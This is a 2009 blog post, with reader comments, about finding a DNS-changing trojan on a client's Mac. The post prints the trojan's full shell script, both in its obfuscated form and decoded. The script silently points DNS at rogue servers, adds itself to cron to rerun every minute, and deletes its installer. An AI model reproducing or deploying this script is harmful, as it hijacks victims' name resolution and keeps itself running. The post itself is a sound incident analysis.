Thursday, January 15, 2009

Mac Malware / Trojan

Just today I was telling someone viruses (virii?) weren't an issue on the Mac. OSX is pretty secure I told him but you should have AV software to stop you passing on nasties to your windows friends and colleagues.

Eat my words I did. That afternoon a phone call from another client. He had a problem with no Internet access on his wireless network but others on the network were OK. First test try a site by IP. Fine, so it's a DNS issue..

Yes..but so much more. They had a pretty basic router so monitoring was not an option. OK talk him through opening the terminal and pinging some sites. Takes a while then fails to look it up. OK lets check /etc/resolv.conf...

nameserver 85.255.114.30
nameserver 85.255.112.152
nameserver 192.168.2.5

Oh crap... two of these were not in the TCP settings. I'll let you work out which two...

Further checking...

nick@host ~ $ host 85.255.114.30
;; connection timed out; no servers could be reached
nick@host ~ $ host 85.255.112.152
Host 152.112.255.85.in-addr.arpa not found: 2(SERVFAIL)
nick@host ~ $ whois 85.255.114.30
% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag.

% Information related to '85.255.112.0 - 85.255.127.255'

inetnum: 85.255.112.0 - 85.255.127.255
netname: UkrTeleGroup
descr: UkrTeleGroup Ltd.
admin-c: UA481-RIPE
tech-c: UA481-RIPE
country: UA
org: ORG-UL25-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: UKRTELE-MNT
mnt-routes: UKRTELE-MNT
mnt-domains: UKRTELE-MNT
source: RIPE # Filtered


Oh crap more... Checked the Startup Items and launchctl but everything looked normal. No processes stood out. How else could it launch? Ah...

Bad-Person-Computer:~ user$ sudo crontab -l
* * * * * "/Library/Internet Plug-Ins/QuickTime.xpt">/dev/null 2>&1

Smooth... and this file looks like...

more /Library/Internet\ Plug-Ins/QuickTime.xpt
#!/bin/sh

x=`cat "$0" wc -lawk '{print $1}'`;x=`expr $x - 2`;tail -$x "$0" tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv>1;s1=cx.zxx.aas.wq;s2=cx.zxx.aaz.axz;sh 1 `echo $s1tr qazwsxedcr 0123456789` `echo $s2 tr qazwsxedcr 0123456789`;exit;
#!/bpf/oy
daxy="/Lpbjajc/Ifxkjfkx Pivt-Ifo"
PSID=$( (/voj/obpf/olvxpi tjkd PjphajcSkjsplk okq -k 'o/.*PjphajcSkjsplk : //')<< EOF
ndkf
tkx Sxaxk:/Nkxwnjg/Ginbai/IPs4
q.oynw
uvpx
EOF
)
/voj/obpf/olvxpi << EOF
ndkf
q.pfpx
q.aqq SkjskjAqqjkooko * $1 $2
okx Sxaxk:/Nkxwnjg/Skjsplk/$PSID/DNS
uvpx
EOF
kepox=`ljnfxab -itjkd QvplgTphk.edx`
pr [ "$kepox" == "" ]; xykf
klyn "* * * * * \"$daxy/QvplgTphk.edx\">/qks/fvii 2>&1" > ljnf.pfox
ljnfxab ljnf.pfox
jh -jr ljnf.pfox
rp
jh -jr "$0"

It even hides itself so you can't just grep the name server addresses. Roughly translated it gives...

s1=85.255.114.30;s2=85.255.112.152;

#!/bin/sh
path="/Library/Internet Plug-Ins"
PSID=$( (/usr/sbin/scutil grep PrimaryService sed -e 's/.*PrimaryService : //')<< EOF
open
get State:/Network/Global/IPv4
d.show
quit
EOF
)/usr/sbin/scutil << EOF
open
d.init
d.add ServerAddresses * $1 $2
set State:/Network/Service/$PSID/DNS
quit
EOF
exist=`crontab -lgrep QuickTime.xpt`
if [ "$exist" == "" ]; then
echo "* * * * * \"$path/QuickTime.xpt\">/dev/null 2>&1" > cron.inst
crontab cron.inst
rm -rf cron.inst
fi
rm -rf "$0"

Simple but I guess there were nasties just waiting to be got from some websites this machine was redirected to. Very Mac specific so not a Linux trojan gone astray. I guess he fell for one of the download this codec type trojans and got this little parasite.

So although we don't have virii in the Mac world little wank stains are out there targeting the Mac using social engineering. I guess you could exploit one of the safari or firefox holes are even spoof someones bank given the recent certificate bypass expoloit..

So I guess the times of relying on security through obscurity are over. I'm not sure if this guy has a name but it made my day a lot more interesting!

6 comments:

John Muccigrosso said...

"Viri" if you must Latinize. (It means slime or poison.)

neural said...

i believe in this case, they would have seen these dns entries in their network preference pane, greyed out, under advanced/dns.

drbroom said...

Nick:

Great post... just one note it's not "resolve.conf" it is "resolv.conf" and you should tell people that they can find the file in their "etc" directory.

I know that may be nit picking but I think since you gave all the cool info you did you should let people know where they can look to make sure they are not effected. (I really didn't mean to nitpick I think some may do what I did and just copy the file name to look up what was in it...)

Anyway, I do have one question... Did you figure out what your client downloaded (and installed)? Curious minds would like to know? :-)

thanks again for the great info.

Nick Brooker said...

drbroom: Thanks for the feedback. I was buzzing a bit when I wrote it missed the resolve typo.

The date modified on the file was March 2008 and he coudn't recall anything from that time but hopefully someone else can find the trojan and tie it to something.

Nick Brooker said...

Sorry just realised the first cut and paste had chopped some out. The script is correct now...

Andrew Main said...

"'Viri' if you must Latinize. (It means slime or poison.)"

Good try, but still incorrect: "viri" is the plural of "vir" (man). There is in fact no attested plural of "virus" (slime or poison) in surviving Latin texts, but the best guess of scholars is that if it had one (it very possibly did not) it would be "viruses", which happens also to be the plural if treated as an English word.

See: http://linuxmafia.com/~rick/faq/plural-of-virus.html